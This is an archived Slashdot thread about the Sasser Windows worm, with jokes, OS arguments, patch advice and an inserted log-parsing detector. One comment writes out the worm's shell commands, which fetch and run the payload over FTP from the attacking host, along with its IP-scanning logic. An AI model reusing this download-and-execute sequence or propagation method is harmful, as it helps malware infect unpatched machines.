
New Windows Worm on the Loose

michael posted more than 10 years ago | from the batten-down-your-ports dept.

Security 622

Dynamoo writes "The Internet Storm Center has issued a Yellow Alert due to the spread of the Sasser worm exploiting Windows 2000 and XP machines through a documented flaw in the Local Security Authority Subsystem Service (LSASS) as described in Microsoft Bulletin MS04-011. Initial analysis seems to indicate classic Blaster-style worm behaviour. Right now I'm just getting a probe every 10 minutes or so on my firewall, but this is bound to escalate sharply as the pool of infected machines grows. Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you? More information at Computer Associates, F-Secure, Symantec and McAfee."

Sorry! There are no comments related to the filter you selected.

ah... (5, Funny)

Anonymous Coward | more than 10 years ago | (#9028359)

the luxury of being behind a nat box with all ports off and not having to deal with such nonsense

Re:ah... (5, Funny)

Interruach (680347) | more than 10 years ago | (#9028414)

ahh, the luxury of the first box after the NAT being a linux proxy server that serves my entire internal network.

-- I see your nat box and raise you a proxy server.

Re:ah... (1, Funny)

Anonymous Coward | more than 10 years ago | (#9028571)

Ha, an IP Masqueraded Linux Firewall beats both (ip 10.0.0.1)! Bow before my geekdom!

Re:ah... (1, Funny)

Anonymous Coward | more than 10 years ago | (#9028637)

You wish. An OpenBSD box set up as a firewalling bridge between the Internet and the local network kicks all your asses.

Re:ah... (5, Insightful)

Anonymous Coward | more than 10 years ago | (#9028437)

the luxury of being behind a nat box with all ports off and not having to deal with such nonsense

Yeah... till your buddy comes over to play Counterstrike and plugs into your hub infecting your machine.

Re:ah... (1, Funny)

Anonymous Coward | more than 10 years ago | (#9028562)

must be hard accessing the net what with port 80 turned off eh? :)

FP! (-1, Offtopic)

Anonymous Coward | more than 10 years ago | (#9028364)

w00t

I Use X Windows (5, Funny)

craXORjack (726120) | more than 10 years ago | (#9028367)

Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you?

What is this 'Windows Update' of which you speak?

Re:I Use X Windows (1, Informative)

Anonymous Coward | more than 10 years ago | (#9028392)

What is this 'Windows Update' of which you speak?

It's started when you do

# apt-get update && apt-get dist-upgrade

Re:I Use X Windows (2, Insightful)

squall14716 (734306) | more than 10 years ago | (#9028417)

Actually, I use:
emerge -uD world
;)

Re:I Use X Windows (2, Interesting)

Anonymous Coward | more than 10 years ago | (#9028490)

Anyone coin a "Godwin's Law for Gentoo Zealots" yet?

Re:I Use X Windows (3, Funny)

squall14716 (734306) | more than 10 years ago | (#9028517)

Hey! I'm not a zealot, I just have this much time on my hands.

Re:I Use X Windows (0)

Anonymous Coward | more than 10 years ago | (#9028396)

X Windows? Never heard of that, but X Window [x.org], I have heard of.

Re:I Use X Windows (1)

craXORjack (726120) | more than 10 years ago | (#9028536)

You are just a MS fanboy trying to defend Microsoft's trademarked use of the word, but it never should have been granted as proven in the Lindows lawsuit because the term Windows is and always has been commonly used for any windowing environment.

Google search for "X Windows": 1,620,000 hits [google.com]
Google search for "X Window": 1,820,000 hits [google.com]

Re:I Use X Windows (2, Informative)

squall14716 (734306) | more than 10 years ago | (#9028627)

It's called X Window System, not X Windows. Calling someone an MS fanboy because they point this out is uncalled for. Speaking of which... there are MS fanboys? Are these people out of their minds?

Re:I Use X Windows (5, Funny)

temojen (678985) | more than 10 years ago | (#9028405)

I believe it's a kludgey Microsoft variant of

"emerge sync; emerge -uD --fetchonly world; emerge -uD world; etc-update"

except that it requires you to reboot several times and repeatedly interact with it.

Re:I Use X Windows (0)

Anonymous Coward | more than 10 years ago | (#9028507)

While the reboot may take a minute or two, it's certainly not on the order of 4 hours...

Re:I Use X Windows (2, Funny)

temojen (678985) | more than 10 years ago | (#9028589)

But you can't use your computer while it's going either.

Re:I Use X Windows (-1, Offtopic)

Anonymous Coward | more than 10 years ago | (#9028636)

hahah are you stoned?

Re:I Use X Windows (1)

chosen_my_foot (677867) | more than 10 years ago | (#9028608)

I use Windows and I have used Gentoo. Windows update rarely requires more than a click on an "I accept" button, and one reboot. OTOH, I guess some people would rather wait a few hours for their updates in order to completely automate the system. *shrug*

Re:I Use X Windows (0)

Anonymous Coward | more than 10 years ago | (#9028649)

fuck! Do you google for that each time you want to update your machine?

Oh, lemme guess. You have typed it in so many times you know it from memory.

Re:I Use X Windows (1)

Three Headed Man (765841) | more than 10 years ago | (#9028482)

I just ran Windows update and there's no patch yet. The Redmond boys have yet to address this.

Re:I Use X Windows (5, Informative)

bamf (212) | more than 10 years ago | (#9028576)

You've probably already installed it, just look for KB835732 in your list of installed updates.

Mutex Trapping (5, Interesting)

Mr. Darl McBride (704524) | more than 10 years ago | (#9028369)

About the first thing any Windows program does is to attempt to acquire a mutex to see if the program is already running. In the case of this worm, that's "Jobaka3l." If that exists, the worm dies off without running.

Mutexes are named consistently enough under Windows that I wish somebody would make a program that simply caught all attempts at gaining a mutex and popped up a dialog window if the mutex hadn't been seen before. This would stop most any new software from running without first checking with the user. This is no good for a server of course, but ideal for a workstation.

This would also be great for catching spyware crap installs, as well as things like the RealPlayer toolbar that keeps popping up adverts by default. Simply tell the mutex checker to decline the requested mutex from then on and it would have the mutex always fail from then on -- then those programs could never be run again.

Re:Mutex Trapping (3, Interesting)

Mr. Darl McBride (704524) | more than 10 years ago | (#9028385)

For that matter, how hard would it be to restrict which programs are allowed to create files with runnable extensions without prompting?

Why can't we have something that protects the registry and pops up whenever something wants to go into software/microsoft/windows/run, /runonce, runonceex, etc? 3/4 of the stuff that goes in there, I end up ripping out later. It's dumb that it's so easy for programs to install things there.

Re:Mutex Trapping (5, Informative)

Anonymous Coward | more than 10 years ago | (#9028427)

You can set permissions in the registry per key.

Make it impossible to write to HKLM/software/microsoft/windows/currentversion/run

Re:Mutex Trapping (1)

Saint Aardvark (159009) | more than 10 years ago | (#9028444)

Cool! How?

Re:Mutex Trapping (5, Informative)

stef0x77 (529972) | more than 10 years ago | (#9028496)

Use regedt32.exe (which is an older incarnation of regedit), go to the key in question, choose Security | Permissions ... from the menu etc...

Re:Mutex Trapping (1)

Saint Aardvark (159009) | more than 10 years ago | (#9028530)

Coolness...thanks for the tip.

Re:Mutex Trapping (4, Informative)

cscx (541332) | more than 10 years ago | (#9028525)

Run "regedit", then right click any key, and select "Permissions" -- you get a standard NTFS permissions box to fiddle with at your leisure.

Note this only works on NT-based systems (e.g., WinXP)

Re:Mutex Trapping (5, Informative)

kyhwana (18093) | more than 10 years ago | (#9028519)

Err, Startup Monitor [mlin.net] does just that.
Well, it doesn't protect the registry, but it does pop up a dialog box whenever something tries to add itself to those registry entries..

Re:Mutex Trapping (0, Redundant)

Mr. Darl McBride (704524) | more than 10 years ago | (#9028628)

Err, Startup Monitor does just that
Sexcellent! Thank you!

Re:Mutex Trapping (4, Informative)

Verteiron (224042) | more than 10 years ago | (#9028546)

It exists already. There are several, some free, some not, but the most useful (and free!) one I've found so far is the brand-new Spybot [spybotsd.info] TeaTimer. It's available with the newest release candidate. You can download that here [net-integration.net] (link at the bottom of the forum post). Just run Spybot SD, do the immunization and such, run the scan, then switch it to Advanced mode and activate the "resident protection". Bingo. Nothing will ever write itself into your startup, or install a BHO, or toolbar, or change your homepage, without your knowledge and permission. Bear in mind it's a release candidate and there may be bugs; I know the Teatimer sometimes shuts off when you run the main Spybot program, and you have to go activate it again. Other than that it seems to work like a charm.

Re:Mutex Trapping (0)

Anonymous Coward | more than 10 years ago | (#9028409)

In fact Symantec's worm blocker does exactly this...looks for mutex names of spyware.

Re:Mutex Trapping (4, Informative)

The Raven (30575) | more than 10 years ago | (#9028412)

Toolbars and similar items would not be prevented by blocking mutexes as far as I know, because they don't create one. They run under the IE process.

However, for most other types of spyware I completely agree, that would be an excellent idea for screening running processes.

Re:Mutex Trapping (3, Informative)

Joe U (443617) | more than 10 years ago | (#9028413)

Interesting concept, but many programs use lots of mutexes, and some don't use them at all.

Imagine running something complex like a database server. Dialog box fun.

The virus writers will just use something else, like a file, if people tracked by mutex.

Re:Mutex Trapping (1)

Mr. Darl McBride (704524) | more than 10 years ago | (#9028439)

Interesting concept, but many programs use lots of mutexes, and some don't use them at all.

Imagine running something complex like a database server. Dialog box fun.

Yeah. I guess with something like that, you could have accept/deny mutex, as well as accept/deny app. Then something like C:/SOME/PATH/TO/MSQL.EXE could be allowed to run unencumbered from then on if its MD5 hash hadn't changed.

Re:Mutex Trapping (2, Insightful)

SchnauzerGuy (647948) | more than 10 years ago | (#9028449)

Creating a mutex at startup is by no means universal, and in fact, I doubt that it's very common at all.

If there was a mutex checker/blocker program developed, you would just see worm authors switch to a different method of determining if their worm was already running, or randomize the mutex name.

Re:Mutex Trapping (0)

Anonymous Coward | more than 10 years ago | (#9028509)

Randomizing a mutex name really defeats the purpose of the mutex.

The concept behind using a mutex is to stop reentrancy (is that a real word?) in a critical section across applications.

If you randomize it, you might as well take it out.

Re:Mutex Trapping (1)

Mr. Darl McBride (704524) | more than 10 years ago | (#9028607)

Randomizing a mutex name really defeats the purpose of the mutex.

The concept behind using a mutex is to stop reentrancy (is that a real word?) in a critical section across applications.

You could certainly randomize the generation scheme, however. A hash on the system name and the date would limit additional infections to one per day, for example.

Re:Mutex Trapping (2, Insightful)

eyeye (653962) | more than 10 years ago | (#9028470)

Many modern firewalls already flag up applications running and allow you to block them.

They don't rely on mutexes either.

Troll alert! (0)

Anonymous Coward | more than 10 years ago | (#9028529)

Worms and spyware will simply use a home-made mutex system if we start to block the windows one.

In general, the idea of catching windows library calls is worthless, unless the library call is absolutely necessary to the worm and the functionality cannot be done in any other way (which is not the case in Mr. Darl McBride's example).

Re:Mutex Trapping (2, Insightful)

Mr. Darl McBride (704524) | more than 10 years ago | (#9028585)

Worms and spyware will simply use a home-made mutex system if we start to block the windows one.

In general, the idea of catching windows library calls is worthless, unless the library call is absolutely necessary to the worm and the functionality cannot be done in any other way (which is not the case in Mr. Darl McBride's example).

Of course. They're going to work around any countermeasure if it goes into popular use. Once upon a time, all programs were allowed to write to the entire filesystem. Remember bootsector viruses? They finally reworked the filesystem and device layer so that user code couldn't touch that area anymore, and those kinds of infections went away. Remember Word macro viruses? New versions of Office warn you about macros that want to run on opening a doc, and those are rapidly vanishing as well.

Similarly, short of reworking the way programs are installed and authorized, nothing is going to work as the long-term solution. That's why Longhorn and the .NET execution framework change these things exactly.

The mutex check is merely one option which doesn't seem to be in widespread use yet. I'm sure there are many others, and yes -- any of them would eventually get worked around for new viruses and trojans.

Huh? (5, Funny)

grub (11606) | more than 10 years ago | (#9028371)


A new worm?
May 01 07:59:49.306654 rule 0/0(match): block in on dc0: xx.xx.xx.xx:xxxx > yy.yy.yy.yy:yyyy: S 2881286568:2881286568(0) win 32640 (DF)
Oh, there it is.

THEY COMMETH FROM MINE BUNGHOLE!!! (-1, Offtopic)

Anonymous Coward | more than 10 years ago | (#9028375)

de worms de worms!!!

Removal Instructions (5, Informative)

modifried (605582) | more than 10 years ago | (#9028381)

For anyone already infected, Microsoft has manual removal instructions for the worm, located here:

http://www.microsoft.com/security/incident/sasser.asp [microsoft.com]

Re:Removal Instructions (2, Interesting)

hound3000 (238628) | more than 10 years ago | (#9028560)

For anyone already infected, Microsoft has manual removal instructions for the worm, located here: http://www.microsoft.com/security/incident/sasser.asp [microsoft.com]

Looks like they just cut and pasted that page. Found in source code html...
<TITLE>What You Should Know About the Blaster Worm and Its Variants</TITLE>

<META NAME="Description" CONTENT="The W32.Blaster.Worm and its variants exploits a security issue that was addressed by Microsoft Security Bulletin MS03-026. This worm also has the potential to exploit a similar issue that is addressed by Microsoft Security Bulletin MS03-039. Learn how you can protect yourself from this worm."/>

ah Nice, more work =) (5, Funny)

Quazion (237706) | more than 10 years ago | (#9028382)

At least for me as the local consumer support guy.

Thanks Microsoft.

HAHA (5, Funny)

D-Cypell (446534) | more than 10 years ago | (#9028386)

A smile crept across my face after reading this story and then noticing a microsoft ad underneath informing the reader that Windows Server cost of ownership is lower than Linux cost of ownership!

The ad server must be based on Microsoft's new Irony.NET framework!

Goodness? (0)

Anonymous Coward | more than 10 years ago | (#9028387)

Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you?

I think all good Windows-using Slashdotters should have thrown their Windows machines off a balcony long... long ago.

You must be an american (5, Funny)

empaler (130732) | more than 10 years ago | (#9028630)

Only consumer whores and other types of idiots choose to toss out the computer instead of just wiping the hard drive and installing something else.

Blaster-style? Uh-oh. (3, Interesting)

squall14716 (734306) | more than 10 years ago | (#9028401)

Since most users don't have a firewall and don't use Windows Update, I wonder how many machines will be infected by Monday? Seriously now, it's getting old now. Good thing I'm using Linux now.

Re:Blaster-style? Uh-oh. (0)

Anonymous Coward | more than 10 years ago | (#9028487)

No, now, what's really getting old now is the overuse of the word now, now. :\

Re:Blaster-style? Uh-oh. (1)

squall14716 (734306) | more than 10 years ago | (#9028533)

I type it up, delete half of it and type something else. Don't make fun of my methods. :(

Re:Blaster-style? Uh-oh. (4, Interesting)

FractusMan (711004) | more than 10 years ago | (#9028527)

From the call volume here at work (an ISP), I'd say a LOT. We went from 0 to a couple hundred in queue in an hour. That was last night. Today, it's still as strong.

stay tuned (1, Funny)

Anonymous Coward | more than 10 years ago | (#9028404)

Fox News' official death toll caused by this new exploit stands at zero, but that can change any second now. Find out how to save yourself, tonight after the weather...

already feeling it on college campuses (0)

Anonymous Coward | more than 10 years ago | (#9028407)

at my university (geaux tigers), we're already feeling the effects. students in the dorms don't patch their computers and they wonder why they get viruses. we send out frequent emails reminding them to patch their computers but they fail to realize it. if only they would use linux......:)

consider the jihad (-1, Offtopic)

Anonymous Coward | more than 10 years ago | (#9028420)

Ever notice the "beat the rush and see it early" link at the top of slashdot when a new story is about to come out?

Sounds good, doesn't it? To be able to view the pages linked to in the article before the tens of thousands of other slashbots click to view them.

Did it ever occur to you that you're taking part in cyber-terrorism?

That's right: Slashdot's editors are cyber-terrorists. They coordinate a DOS against small websites, and they attempt to collect money from people who wish to be spared the effects of said DOS. Terrorism, plain and simple.

You can fight this and other crimes by slashdot's editors by joining anti-slash [anti-slash.org] . Anti-slash is committed to forcing the editors to own up to their numerous crimes against the geek community. Until our demands are met, we will relentlessly discredit them as a news service through trolling and other means.

Also, props to poopbot and the alan thicke troll. We remember your accomplishments.

In sacred jihad,

jihadi_31337


Visit Windows Update? (5, Funny)

Anonymous Coward | more than 10 years ago | (#9028421)

No need, I receive all the Windows critical updates by email. I don't know how I got subscribed to that mailing list, but it's damn convenient.

Dang... (4, Funny)

kennylives (27274) | more than 10 years ago | (#9028428)

I have a Mac, you insensitive clod...

Re:Dang... (4, Funny)

skinfitz (564041) | more than 10 years ago | (#9028549)

Well look on the bright side - worms and viruses are the only things that you have less of than games.

Re:Dang... (0)

Anonymous Coward | more than 10 years ago | (#9028619)

Awww, now that's just low...

Security Update Dates (5, Insightful)

TheUnFounded (731123) | more than 10 years ago | (#9028435)

You know, normally these updates are available a good 3 or 4 months before the worm becomes available. This one was updated about 3 days ago. And MS claims to be beefing up their security efforts. ...

YA Windows-only software title (5, Funny)

Anonymous Coward | more than 10 years ago | (#9028441)

In light of this, would someone please explain why I would ever want a Mac? None of the really good viruses or worms are ever ported to it, no matter how successful they are!

Why use windows update? (1)

BlankTim (241617) | more than 10 years ago | (#9028448)

This is either a *really* old issue and I've already patched for it, or it's so new MS doesn't have a patch for it yet.

Either way, I don't see anything about it on the windows update site.

Re:Why use windows update? (3, Informative)

kyhwana (18093) | more than 10 years ago | (#9028547)

The patches were released on the 13th of April; there were four patches which, put together, patch 20 different vulnerabilities.

Linux is vulnerable too (The anti-anti-windows FUD) (-1, Offtopic)

Anonymous Coward | more than 10 years ago | (#9028459)

Remember:

1. Linux isn't as good as Windows, Windows has more accountability and support.

2. If Linux was used as much as Windows then viruses would be as common, instead of incredibly rare.

3. Windows is cheaper than Linux even though Linux is free. It's a TCO type of thing.

4. Gimp sucks compared to Photoshop.

5. Open source is insecure by default. Only by hiding your secrets are they kept safe.

6. IE is better than Firefox because my kids can play Shockwave games on Disney.com

7. MS has Exchange, Linux doesn't.

8. OO.org sucks compared to the usability of Office

9. Linux isn't ready for the Desktop.

10. Grandma can't install Linux.

11. Can't play Everquest on Linux.

12. Users are the problem, Not Microsoft.

(HEY STOP!!, never mind that worm behind the curtain..)

Rinse.. repeat... Best applied bi-weekly or whenever a new worm strikes, whichever comes first. (about a 50-50 chance of either nowadays.)

But... it does! (0, Offtopic)

NSash (711724) | more than 10 years ago | (#9028552)

4. Gimp sucks compared to Photoshop.

Ah, come on now. I'm as friendly to OS as anyone else, but you're just fooling yourself on this one.

Where's Panda? (2, Informative)

RazorX90 (700941) | more than 10 years ago | (#9028465)

More information at Computer Associates, F-Secure, Symantec and McAfee.

Where's Panda [pandasoftware.com] in that list? Personally I prefer Panda over those.

Re:Where's Panda? (1)

LordK3nn3th (715352) | more than 10 years ago | (#9028659)

*sings* Computer Antivirus....Panda!

Loose not lose (5, Funny)

Brian Dennehy (698379) | more than 10 years ago | (#9028466)

I'm impressed that they got the headline right!

No brainer (0, Flamebait)

this takes too long (761596) | more than 10 years ago | (#9028473)

Ya ooo what a gigantic problem.. Every PC user with a brain should have a firewall and anti-virus software running. If they haven't learned yet they deserve to be infected. Here's the extremely complicated solution: auto update every day.

A disturbing trend... (0)

Anonymous Coward | more than 10 years ago | (#9028474)

The hang time between release of information about an exploit and the release of viruses taking advantage of that exploit is going down. It used to be that most worms were based on bugs that were known and patched months or years ago. In the past few months there have been several worms based on bugs that were fixed only days or weeks before. That makes it much more important to keep up to date with patches than it has been historically.

Windows XP SP2 should mitigate this somewhat, since it will tell a lot more people to update a lot more regularly, plus it comes with a decent firewall. The news that it is delayed is unfortunate to say the least.

Same old, same old.... (4, Insightful)

gnuman99 (746007) | more than 10 years ago | (#9028479)

Same old news about another worm. Nothing to see here, move along.

Seriously, hasn't MS learnt anything about the Internet yet? Why do they keep insisting to keep all of these ports open all the time? Why so many services running out of the box? Why can't people even close some of the listening ports?

If MS was any serious about security, they would have all ports closed by default. Or at least have a possibility of closing them down during install.

Re:Same old, same old.... (0)

Anonymous Coward | more than 10 years ago | (#9028534)

There isn't much you can do to fix default configurations if you only release a new version every 5 years or so.

I believe Server 2003 does do the "minimal" route towards security a la Linux/Unix.

Of course this has an expected side effect of making 2003 harder to set up than 2000, but it's easy to mask that issue with new features.

Personally, I'm happy they do anything to make worms less common, then my ping times/connectivity with Quake 3 and UT2004 wouldn't be so bad.

Re:Same old, same old.... (2, Insightful)

Anonymous Coward | more than 10 years ago | (#9028638)

When the first serious Windows worm struck,

- users could have asked for their money back,
- companies could have switched away from Windows en masse,
- government could have banned using Windows in their offices,
- there could have been a class-action lawsuit for gross negligence.

To Microsoft's surprise and delight, none of this happened. That's why we're seeing a 379th worm today.

How it works (5, Informative)

mrneutron (61365) | more than 10 years ago | (#9028493)

It infects a 2000 or XP box via the LSASS (MS04-011) exploit, and opens a shell on port 9996.

It then connects to that shell, and executes the following commands (cleaned up to get past Slashdot's junk filter):

open XXX.XXX.XXX.XXX 5554

anonymous

user

bin

get XXXXX_up.exe

bye

XXXXX_up.exe

If successful, those commands ftp to the attacking host, port 5554, and download the actual worm payload. That payload is executed, and the host is fully infected. It then opens an FTP port on port 5554, and begins scanning for vulnerable hosts. Here's the scanning logic, from symantec:

The IP addresses generated by the worm are distributed as follows:

50% are completely random

25% have the same first octet as the IP address of the infected host

25% have the same first and second octets as the IP address of the infected host.

The worm starts 128 threads that scan randomly-chosen IP addresses. This demands a lot of CPU time and as a result an infected computer may be so slow as to be barely usable.

See:

  • http://securityresponse.symantec.com/avcenter/venc/data/w32.sasser.worm.html

Unoptimized algorithm... (2, Insightful)

Henk Poley (308046) | more than 10 years ago | (#9028563)

Don't these worm writers learn [berkeley.edu] anything?

Windows update doesn't work with illegal copies (0)

Anonymous Coward | more than 10 years ago | (#9028498)

So I used Microsoft Baseline Security Analyzer to get my patches.

Re:Windows update doesn't work with illegal copies (0)

Anonymous Coward | more than 10 years ago | (#9028566)

What a surprise, Microsoft puts their own revenues ahead of the general welfare of the Internet. I never saw that coming.

They should at least allow the critical security updates to be downloaded, no matter what. Then again, since Windows' has such Swiss cheese, Mickey Mouse security, nearly every update is a fucking critical security update.

Still, I fail to see who Microsoft thinks they're punishing by not allowing illegal copies to work with Windows Update. Hell, probably 80% of the Joe Sixpacks who buy PCs and own legal copies of Windows don't use Windows Update.

Dammit... (3, Interesting)

Saint Aardvark (159009) | more than 10 years ago | (#9028503)

I want a tarpit option for FreeBSD's ipfw, the same way there is for Linux. It'd be nice to do something to slow this thing down...not that it's easy to tell this worm apart from everything else cluttering up my firewall logs.

This is news? (1, Funny)

bcmm (768152) | more than 10 years ago | (#9028505)

Hmm... a new windows worm, exploiting a documented flaw? Never!

Whats new?

Shocking! (0, Troll)

focitrixilous P (690813) | more than 10 years ago | (#9028513)

Slashdot continues its trend of releasing news that will shake your beliefs to the core! I thought for sure the previous worm was the last possible one!

This close to removing win2k... (3, Interesting)

brendanoconnor (584099) | more than 10 years ago | (#9028520)

Currently I'm running win2k on my main desktop fully patched, so this little problem doesn't really hurt me per se. With all the patches in place, my computer does some of the following things.

1) IE won't work (joking aside it just doesn't work at all). This happened a long time ago, so I switched to Mozilla. I thank MS for this cause Moz. owns.

2) Add/Remove programs, I can no longer see the text to describe the program install. It's all grey. An icon shows, so I can uninstall that way. It's not the color scheme either, I tried MS default and it still didn't work.

3) I was having problems with this latest worm, but patching fixed everything, so now we wait to see what broke.

All in all I'm getting extremely close to wiping the HDD, and dual booting Slackware Linux (which has been on my laptop for over a year and I love it) and win98se for games. All the backups are current, and I'm waiting for the next problem to make the system more unusable. If I wasn't so damn lazy, this would have been done sooner.

Brendan

Re:This close to removing win2k... (1)

nazsco (695026) | more than 10 years ago | (#9028572)

>> and win98se for games

Bochs [sourceforge.net] for the old dos games, and Wine [winehq.com] for new ones (like, counter strike or warcraft 3 --ok, not so *new* ones) and you're free of the windows 98 price tag and dual boot

Help the poor bastards (5, Funny)

nazsco (695026) | more than 10 years ago | (#9028535)

The worm seems to install an FTP server on infected machines. So, wouldn't it be nice to have every box that detects a connection on port 554 reply with an upload of a new wallpaper to the infected Windows box with some message like "install a firewall, moron"

I consider it a public service. Maybe you can even deduct the bandwidth for the upload from your tax.

Oh the irony (1)

BillLeeLee (629420) | more than 10 years ago | (#9028542)

I had updated Windows XP except for whatever patch it was for this security hole because I had heard it caused problems. Then of course, Sasser hits and targets the security hole that I didn't patch for.

Damned if you do, damned if you don't.

I'm rebooting into Linux. Screw you Windows.

Re:Oh the irony (1)

Saint Aardvark (159009) | more than 10 years ago | (#9028614)

I got lucky on this one. There was one machine at work where the patch caused problems; since it was a license server, I had to remove it. While I was trying to find a way to have my patch and a working machine, the power supply and/or motherboard died. New machine, new install of 2K, and all the patches.

Days like this... (5, Funny)

C0rinthian (770164) | more than 10 years ago | (#9028554)

I REALLY hate working dial-up tech support.
(ring)
sigh....

Re:Days like this... (0, Redundant)

DarkAce911 (245282) | more than 10 years ago | (#9028591)

Monday is going to suck if this gets inside our firewall at work. This is the patch we did not push because it causes 100% processor usage in some machines (MS04-11). Oh well, I am not going in to work this weekend, this worm will have all weekend to grow.

DarkAce911

Re:Days like this... (1)

Saint Aardvark (159009) | more than 10 years ago | (#9028598)

Oh god, I'm sorry. Used to work Saturdays too. My sincere sympathies.

A little late this week (0)

Anonymous Coward | more than 10 years ago | (#9028556)

Usually these happen on Thursday.

some important points (4, Informative)

R_V_Winkle (186128) | more than 10 years ago | (#9028578)

In addition to TCP 1025, the following ports are vulnerable to the LSASS exploit: TCP 135, 139, 445, and 593. UDP 135, 137, 138, and 445.

Sasser generates traffic on TCP ports 445, 5554 and 9996.

The patch for the vulnerability (MS04-011) can be installed through Windows Update or located at the following URL:

http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx
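A detection-side reading of the two comments above (mrneutron's infection sequence with its ports 445, 9996 and 5554, and R_V_Winkle's port list), as an added example that is not from the thread: a parser for pf-style firewall lines of the shape grub pasted, correlating events per external peer so that a lone SYN to 445 is reported as a probe while the follow-up shell connection and the payload fetch are reported separately. The log lines, addresses and time stamps are constructed for the example.

```python
"""Flag Sasser-style activity in OpenBSD pf/tcpdump-style firewall log lines.

Added example, not from the thread. Per external peer it correlates the ports
the thread describes: inbound SYNs to the LSASS-exposed ports, an inbound
connection to the worm's shell on TCP 9996, and an outbound connection from an
internal host to the peer's FTP server on TCP 5554 (the payload download).
"""
import re
from collections import defaultdict

LSASS_PORTS = {135, 139, 445, 593, 1025}   # TCP ports listed as exposed to the LSASS flaw
SHELL_PORT = 9996                          # shell opened on the victim by the exploit
FTP_PORT = 5554                            # FTP server the worm runs on an infected host

# Shape of the line quoted in the thread:
# May 01 07:59:49.306654 rule 0/0(match): block in on dc0: a.b.c.d:p > e.f.g.h:q: S ...
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \d{2} [\d:.]+) rule \S+: (?P<action>block|pass) "
    r"(?P<dir>in|out) on (?P<ifc>\w+): "
    r"(?P<src>\d+\.\d+\.\d+\.\d+):(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+):(?P<dport>\d+): (?P<flags>\S+)"
)

# Constructed sample log (RFC 5737 documentation addresses, made-up time stamps).
SAMPLE_LOG = """\
May 01 07:59:49.306654 rule 0/0(match): block in on dc0: 203.0.113.7:3412 > 192.0.2.10:445: S 2881286568:2881286568(0) win 32640 (DF)
May 01 08:00:02.118803 rule 0/0(match): block in on dc0: 198.51.100.23:1033 > 192.0.2.10:445: S 1109237:1109237(0) win 16384 (DF)
May 01 08:00:03.004512 rule 0/0(match): pass in on dc0: 198.51.100.23:1034 > 192.0.2.10:9996: S 1109899:1109899(0) win 16384 (DF)
May 01 08:00:04.771120 rule 0/0(match): pass out on dc0: 192.0.2.10:1041 > 198.51.100.23:5554: S 887231:887231(0) win 64240 (DF)
May 01 08:03:11.555001 rule 0/0(match): block in on dc0: 203.0.113.7:3419 > 192.0.2.10:139: S 2881290001:2881290001(0) win 32640 (DF)
May 01 08:04:00.000001 rule 0/0(match): block in on dc0: 203.0.113.9:4100 > 192.0.2.10:80: S 44:44(0) win 5840 (DF)
"""


def parse_line(line):
    """Return the interesting fields of one log line as a dict, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["sport"] = int(ev["sport"])
    ev["dport"] = int(ev["dport"])
    return ev


def _syn_events(lines):
    """Yield parsed connection attempts (SYN) only; other packets and unparseable lines are skipped."""
    for line in lines:
        ev = parse_line(line)
        if ev is not None and ev["flags"].startswith("S"):
            yield ev


def lsass_probe_counts(lines):
    """Count inbound SYNs to the LSASS-exposed ports per source address (the 'N attempts' number)."""
    counts = defaultdict(int)
    for ev in _syn_events(lines):
        if ev["dir"] == "in" and ev["dport"] in LSASS_PORTS:
            counts[ev["src"]] += 1
    return dict(counts)


def classify(lines):
    """Correlate events per external peer and return {peer: verdict}.

    probe   - only SYNs to LSASS-exposed ports (the background noise the thread describes)
    shell   - an inbound connection to the TCP 9996 shell was also seen from that peer
    payload - an internal host connected out to the peer's TCP 5554 (worm fetched the payload)
    """
    seen = defaultdict(set)
    for ev in _syn_events(lines):
        if ev["dir"] == "in" and ev["dport"] in LSASS_PORTS:
            seen[ev["src"]].add("lsass")
        elif ev["dir"] == "in" and ev["dport"] == SHELL_PORT:
            seen[ev["src"]].add("shell")
        elif ev["dir"] == "out" and ev["dport"] == FTP_PORT:
            seen[ev["dst"]].add("ftp")
    verdicts = {}
    for peer, tags in seen.items():
        if "ftp" in tags:
            verdicts[peer] = "payload"
        elif "shell" in tags:
            verdicts[peer] = "shell"
        else:
            verdicts[peer] = "probe"
    return verdicts


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    counts = lsass_probe_counts(lines)
    for peer, verdict in sorted(classify(lines).items()):
        print(f"{peer:16} {verdict:8} lsass-port SYNs: {counts.get(peer, 0)}")
```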

Once again... (0)

Anonymous Coward | more than 10 years ago | (#9028602)

...Mac users worldwide pause, yawn/chuckle, and resume being productive on their machines instead of patching holes or manually yanking out already-present malware.

Windows update freaking out! (5, Funny)

nazsco (695026) | more than 10 years ago | (#9028616)

after reading this on the /. front page, i ran the Windows Update, which i hadn't visited for more than a year...

and after some time, a window pops up with the text:
"The software you are installing has not passed the Windows Logo testing to verify its compatibility with Windows XP. bla bla bla"
"This software will *not be installed*. Contact your system administrator."

Ok, so i contact myself, and wonder what the hell?!?

I just gave M$ a lot of information about the operating system that i'm running... they wrote the friggin' thing, and even so, they don't know what will run on it, or what will pass their own crap compatibility verification!

but well, that's it... i just click "OK" --the only button-- and see the same window appear 3 times more... and blissfully keep my ignorance of what's going on with the installation.

I can verify this. (0)

Anonymous Coward | more than 10 years ago | (#9028622)

424 attempts in my logs since April 29. All coming through port 1025, mostly from Asian boxes.

That's funny. (2, Interesting)

LordK3nn3th (715352) | more than 10 years ago | (#9028642)

Speaking of worms, how easily could worms spread if it were Linux that was popular and not windows?

I know linux is more secure, especially because of the multi-user system where root is only used for special reasons, and that many windows programs are integrated in the OS (IE, Outlook...), but how feasible WOULD it be to make worms for Linux? I really don't know. I do use Linux, and I love it. I only boot into windows for certain things such as Battlefield 1942...

Well done, submitter! (5, Funny)

6Yankee (597075) | more than 10 years ago | (#9028643)

How refreshing. A Slashdot article about a worm exploiting Windows, without the usual childish jibes. Or FUD. Or spelling mistakes. Well done, Dynamoo!

Of course, then came the comments... :-)

but surely (1)

Anonymous Coward | more than 10 years ago | (#9028656)

Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you?
Why would they need to? A good Windows user is a dead Windows user.